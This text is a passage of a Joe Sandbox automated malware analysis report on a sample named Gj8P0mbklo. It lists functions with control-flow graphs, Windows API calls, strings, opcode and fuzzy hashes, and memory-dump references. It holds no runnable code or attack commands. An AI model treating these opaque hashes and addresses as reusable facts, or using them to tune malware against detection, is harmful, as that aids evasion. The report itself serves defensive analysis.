                                                                                                                                                                                            • Instruction Fuzzy Hash: E411A531A01210ABDB267F799C8AF5B7A9CEF0A751F004067F505EF256D779EC008BA8
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0037A31A Relevance: 9.3, APIs: 6, Instructions: 265COMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 7679 37a31a-37a328 7680 37a33d-37a34d 7679->7680 7681 37a32a-37a33b call 37b13c call 380fc8 7679->7681 7682 37a362-37a368 7680->7682 7683 37a34f-37a360 call 37b13c call 380fc8 7680->7683 7700 37a390-37a392 7681->7700 7686 37a370-37a376 7682->7686 7687 37a36a 7682->7687 7706 37a38f 7683->7706 7692 37a393 call 387ed4 7686->7692 7693 37a378 7686->7693 7690 37a382-37a38c call 37b13c 7687->7690 7691 37a36c-37a36e 7687->7691 7704 37a38e 7690->7704 7691->7686 7691->7690 7701 37a398-37a3ad call 387383 7692->7701 7693->7690 7698 37a37a-37a380 7693->7698 7698->7690 7698->7692 7708 37a3b3-37a3bf call 3873af 7701->7708 7709 37a5a0-37a5aa call 380ff5 7701->7709 7704->7706 7706->7700 7708->7709 7714 37a3c5-37a3d1 call 3873db 7708->7714 7714->7709 7717 37a3d7-37a3ec 7714->7717 7718 37a3ee 7717->7718 7719 37a45c-37a467 call 38760a 7717->7719 7720 37a3f0-37a3f6 7718->7720 7721 37a3f8-37a414 call 38760a 7718->7721 7719->7704 7726 37a46d-37a478 7719->7726 7720->7719 7720->7721 7721->7704 7729 37a41a-37a41d 7721->7729 7727 37a494 7726->7727 7728 37a47a-37a483 call 387f31 7726->7728 7731 37a497-37a4ab call 394a80 7727->7731 7728->7727 7737 37a485-37a492 7728->7737 7732 37a423-37a42c call 387f31 7729->7732 7733 37a599-37a59b 7729->7733 7740 37a4ad-37a4b5 7731->7740 7741 37a4b8-37a4df call 3949d0 call 394a80 7731->7741 7732->7733 7742 37a432-37a44a call 38760a 7732->7742 7733->7704 7737->7731 7740->7741 7750 37a4e1-37a4ea 7741->7750 7751 37a4ed-37a514 call 3949d0 call 394a80 7741->7751 7742->7704 7747 37a450-37a457 7742->7747 7747->7733 7750->7751 7756 37a516-37a51f 7751->7756 7757 37a522-37a531 call 3949d0 7751->7757 7756->7757 7760 37a533 7757->7760 7761 37a559-37a579 7757->7761 7762 37a535-37a537 7760->7762 7763 37a539-37a54d 7760->7763 7764 37a596 7761->7764 7765 37a57b-37a594 7761->7765 7762->7763 7766 37a54f-37a551 7762->7766 7763->7733 7764->7733 7765->7733 7766->7733 7767 37a553 7766->7767 7767->7761 7768 37a555-37a557 7767->7768 7768->7733 7768->7761
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • __allrem.LIBCMT ref: 0037A4A2
                                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0037A4BE
                                                                                                                                                                                            • __allrem.LIBCMT ref: 0037A4D5
                                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0037A4F3
                                                                                                                                                                                            • __allrem.LIBCMT ref: 0037A50A
                                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0037A528
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1992179935-0
                                                                                                                                                                                            • Opcode ID: 4cc5fcb63fc0fb0f33292742b2270eaeef427511029ac7991fc2c2c9b2d6257d
                                                                                                                                                                                            • Instruction ID: 72091e931c85f66f88fccaa7d1ab9b0fd26713001a5ba228d14719d4dec14559
                                                                                                                                                                                            • Opcode Fuzzy Hash: 4cc5fcb63fc0fb0f33292742b2270eaeef427511029ac7991fc2c2c9b2d6257d
                                                                                                                                                                                            • Instruction Fuzzy Hash: D581F871604B02DBE733AF69CC41B5E73E9AF85324F24C629F459DB681E778D9008751
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00387CC2 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 156timeCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 7918 387cc2-387cf2 call 387377 call 38737d call 3873db 7925 387cf8-387d04 call 387383 7918->7925 7926 387e11-387e68 call 380ff5 call 387972 7918->7926 7925->7926 7932 387d0a-387d16 call 3873af 7925->7932 7938 387e78 7926->7938 7939 387e6a-387e6d 7926->7939 7932->7926 7937 387d1c-387d3d call 38524e GetTimeZoneInformation 7932->7937 7947 387dee-387e10 call 387371 call 387365 call 38736b 7937->7947 7948 387d43-387d63 7937->7948 7942 387e7d-387e91 call 38524e call 374a11 7938->7942 7943 387e78 call 387cc2 7938->7943 7939->7938 7941 387e6f-387e76 call 387a30 7939->7941 7941->7942 7943->7942 7951 387d6d-387d75 7948->7951 7952 387d65-387d6a 7948->7952 7955 387d87-387d89 7951->7955 7956 387d77-387d7e 7951->7956 7952->7951 7960 387d8b-387deb call 376750 * 4 call 384280 call 387e92 * 2 7955->7960 7956->7955 7959 387d80-387d85 7956->7959 7959->7960 7960->7947
                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 0038524E: RtlFreeHeap.NTDLL(00000000,00000000,?,0038BB96,?,00000000,?,?,0038BE37,?,00000007,?,?,0038C3EC,?,?), ref: 00385264
                                                                                                                                                                                              • Part of subcall function 0038524E: GetLastError.KERNEL32(?,?,0038BB96,?,00000000,?,?,0038BE37,?,00000007,?,?,0038C3EC,?,?), ref: 0038526F
                                                                                                                                                                                            • GetTimeZoneInformation.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00387E75,00000000,00000000,00000000), ref: 00387D34
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                            • String ID: W. Europe Standard Time$W. Europe Summer Time$}~8
                                                                                                                                                                                            • API String ID: 3335090040-2327886507
                                                                                                                                                                                            • Opcode ID: 6a557f10be7362b8bbd3970f149e5ea05464f6cffa9789334b82ccd3554346c2
                                                                                                                                                                                            • Instruction ID: a01c5e9d869472776763b0773e71deb18dad4b019bd0ca93f45a84ccfe4e1c96
                                                                                                                                                                                            • Opcode Fuzzy Hash: 6a557f10be7362b8bbd3970f149e5ea05464f6cffa9789334b82ccd3554346c2
                                                                                                                                                                                            • Instruction Fuzzy Hash: 1441D472904315ABCB27BF64DC4699EBB79EF02760B2141E6F814AB1A1EB70DD009B90
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0035EE10 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97COMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 9285 35ee10-35ee39 9286 35ee40-35ee46 9285->9286 9287 35ee3b-35ee3d 9285->9287 9288 35ee4c-35ee56 9286->9288 9289 35eefb call 356060 9286->9289 9287->9286 9290 35ee71-35ee7d 9288->9290 9291 35ee58-35ee6e call 376ca0 9288->9291 9296 35ef00 call 355fc0 9289->9296 9294 35ee86-35ee8d 9290->9294 9295 35ee7f-35ee84 9290->9295 9298 35ee90-35eea4 9294->9298 9295->9298 9300 35ef05-35ef0a call 380fd8 9296->9300 9301 35eec7-35eec9 9298->9301 9302 35eea6-35eeab 9298->9302 9305 35eed6 9301->9305 9306 35eecb-35eed4 call 374c1c 9301->9306 9302->9296 9303 35eead-35eeba call 374c1c 9302->9303 9303->9300 9314 35eebc-35eec5 9303->9314 9310 35eed8-35eef8 call 376ca0 9305->9310 9306->9310 9314->9310
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 0035EF00
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                            • String ID: 0p5
                                                                                                                                                                                            • API String ID: 118556049-2728821079
                                                                                                                                                                                            • Opcode ID: eaf6eeafe5163bc3c602f97f1789f767a2ed07e258834797a9e9b48ec5ef307e
                                                                                                                                                                                            • Instruction ID: dd9fe2fcc320885abdaaecc1d69aaeaf3aa33191c5509151d6e57c5e4145135e
                                                                                                                                                                                            • Opcode Fuzzy Hash: eaf6eeafe5163bc3c602f97f1789f767a2ed07e258834797a9e9b48ec5ef307e
                                                                                                                                                                                            • Instruction Fuzzy Hash: CC213C72A113049BD73A9F74D842A6AB2E8DF04312F11073EF816CB291DB319A484791
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0035FE50 Relevance: 3.3, APIs: 2, Instructions: 265COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 0035FF67
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 118556049-0
                                                                                                                                                                                            • Opcode ID: 9b54faf3cc7a002fe1f4cf2e8cc186d829ff38ed1ff45ce8044a41b02ec7de7f
                                                                                                                                                                                            • Instruction ID: 93c36b2c54c31f9fba21d1abd367b83a565f405af744e7ea7eb4c27c73174252
                                                                                                                                                                                            • Opcode Fuzzy Hash: 9b54faf3cc7a002fe1f4cf2e8cc186d829ff38ed1ff45ce8044a41b02ec7de7f
                                                                                                                                                                                            • Instruction Fuzzy Hash: 3B715472A001159FCB2AEF78CC82A6FB3A8EF85351B1542B9EC15EB351DB30ED158791
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0038524E Relevance: 3.0, APIs: 2, Instructions: 22memoryCOMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • RtlFreeHeap.NTDLL(00000000,00000000,?,0038BB96,?,00000000,?,?,0038BE37,?,00000007,?,?,0038C3EC,?,?), ref: 00385264
                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,0038BB96,?,00000000,?,?,0038BE37,?,00000007,?,?,0038C3EC,?,?), ref: 0038526F
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ErrorFreeHeapLast
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 485612231-0
                                                                                                                                                                                            • Opcode ID: 8b246e8d89a21940a667ec47a1a308f5d03b1ceced65f3e8aa0493cf6eb6b359
                                                                                                                                                                                            • Instruction ID: f80a5b10bac0c799db1d0fdd801f261892076ea375c3ba4b744e07e05cdf918a
                                                                                                                                                                                            • Opcode Fuzzy Hash: 8b246e8d89a21940a667ec47a1a308f5d03b1ceced65f3e8aa0493cf6eb6b359
                                                                                                                                                                                            • Instruction Fuzzy Hash: 37E08C32504B04AFCB332FA0AC0AB997B6CAB00391F414061F60C8A160DB399850C794
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0035FF80 Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 003600D3
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 118556049-0
                                                                                                                                                                                            • Opcode ID: bb896479fcb77cb24a1ade57c71640002f81142846f9b7e9dea8cb5cf785a998
                                                                                                                                                                                            • Instruction ID: 955728d08cb6fb7eafae87c22b4003c600125f5eed2c5e4b2faee5a5d6d2c822
                                                                                                                                                                                            • Opcode Fuzzy Hash: bb896479fcb77cb24a1ade57c71640002f81142846f9b7e9dea8cb5cf785a998
                                                                                                                                                                                            • Instruction Fuzzy Hash: 3731F572A001199FCF1ADF68CC82AAFB7B4FF44300B1045A9E815EB345D770EE558B91
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00374C1C Relevance: 1.6, APIs: 1, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • ___std_exception_copy.LIBVCRUNTIME ref: 00355FFE
                                                                                                                                                                                              • Part of subcall function 0037650E: RaiseException.KERNEL32(E06D7363,00000001,00000003,00355FDC,?,?,?,?,00355FDC,?,003A5A7C), ref: 0037656E
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ExceptionRaise___std_exception_copy
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3109751735-0
                                                                                                                                                                                            • Opcode ID: c9cd6ad3afdcba1510ee1c7de334b0ee972e6d6baccea915118f40ca9ead844e
                                                                                                                                                                                            • Instruction ID: d2f409187343bd8964eb5df2b762b66b9fa5d7f1c000b0de178379071a5c1a3b
                                                                                                                                                                                            • Opcode Fuzzy Hash: c9cd6ad3afdcba1510ee1c7de334b0ee972e6d6baccea915118f40ca9ead844e
                                                                                                                                                                                            • Instruction Fuzzy Hash: 79012635800B0D7BCB26BAA8EC12D89B36CDE06320B50C521FA18EA491FBB4F95487D1
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 003851F1 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000008,?,?,?,00386317,00000001,00000364,?,00000006,000000FF,?,?,0037B141,0038669F), ref: 00385232
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                                                            • Opcode ID: 6f11d5e1fed936a5cae91e1930be5abcca60f14b47330e4a42eabf84e69953f1
                                                                                                                                                                                            • Instruction ID: 581b40e61fe79aa031d3650cfeef3cf1ea1c6f98c9603af3eb154d2d84ee4c31
                                                                                                                                                                                            • Opcode Fuzzy Hash: 6f11d5e1fed936a5cae91e1930be5abcca60f14b47330e4a42eabf84e69953f1
                                                                                                                                                                                            • Instruction Fuzzy Hash: FDF0E932615B246ADB237B369C06B9B775DAF91760F1648D1BC14DA190CF30D90087E0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0038665C Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,?,?,?,003513C8,00000000,?), ref: 0038668E
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                                                            • Opcode ID: 4891e37b7206c84f5b91ceb0085094caab916664003b50908c8dabdc4a2f238d
                                                                                                                                                                                            • Instruction ID: 21b22c2a75f031958dcaa4783396e35c81541d076fd82b8d3e5657f26ff96cb1
                                                                                                                                                                                            • Opcode Fuzzy Hash: 4891e37b7206c84f5b91ceb0085094caab916664003b50908c8dabdc4a2f238d
                                                                                                                                                                                            • Instruction Fuzzy Hash: 56E02B311043905AD73337759C03B5BB68C9F413B4F1701A1BC0996280FF10DC0087E5
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                            Function 00363BE3 Relevance: 16.4, APIs: 2, Strings: 7, Instructions: 690COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 0036453A
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                            • String ID: Te9$array$object$object key$object separator$parse error$parse_error
                                                                                                                                                                                            • API String ID: 118556049-1052598150
                                                                                                                                                                                            • Opcode ID: b9aab26418535dbf1506ba19a845285e16523048d261b6b5f795375f767741b6
                                                                                                                                                                                            • Instruction ID: 82614b94480177b2f767f7bc92eb424754008d9a7f1ca55e0deb55c49914f193
                                                                                                                                                                                            • Opcode Fuzzy Hash: b9aab26418535dbf1506ba19a845285e16523048d261b6b5f795375f767741b6
                                                                                                                                                                                            • Instruction Fuzzy Hash: 9142D970D102099FDB1ADFA4CC95BEDBBB5EF15300F14866DE406EB246EB749A84CB90
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0037DFC0 Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 455COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: N'9$N'9
                                                                                                                                                                                            • API String ID: 0-4015299821
                                                                                                                                                                                            • Opcode ID: 7c5a4e439db4260b8ba97fc2a09b4b01db6ba13208e6a6a6efe7f77be1289794
                                                                                                                                                                                            • Instruction ID: 751d774ffd85f188cfd791b4530143c4ab75dac8635fa40afbac7a1d388ff0aa
                                                                                                                                                                                            • Opcode Fuzzy Hash: 7c5a4e439db4260b8ba97fc2a09b4b01db6ba13208e6a6a6efe7f77be1289794
                                                                                                                                                                                            • Instruction Fuzzy Hash: 9E024E75E002199BDF25CFA9C880AAEFBF5FF48314F1582A9E519EB341D735A901CB90
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0039142E Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1473COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: __floor_pentium4
                                                                                                                                                                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                            • API String ID: 4168288129-2761157908
                                                                                                                                                                                            • Opcode ID: d06f69d364ee34a3c2d1e248609cd19968a3a4677afc982ffd880462abdef489
                                                                                                                                                                                            • Instruction ID: 2d4a7e44c664b92a6cf90f0084441309e21b17233e6551464aa034ac94d62acd
                                                                                                                                                                                            • Opcode Fuzzy Hash: d06f69d364ee34a3c2d1e248609cd19968a3a4677afc982ffd880462abdef489
                                                                                                                                                                                            • Instruction Fuzzy Hash: B7D23A72E086299FDF66CE28CD407EAB7B9EB45305F1541EAD40DE7240E778AE818F41
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

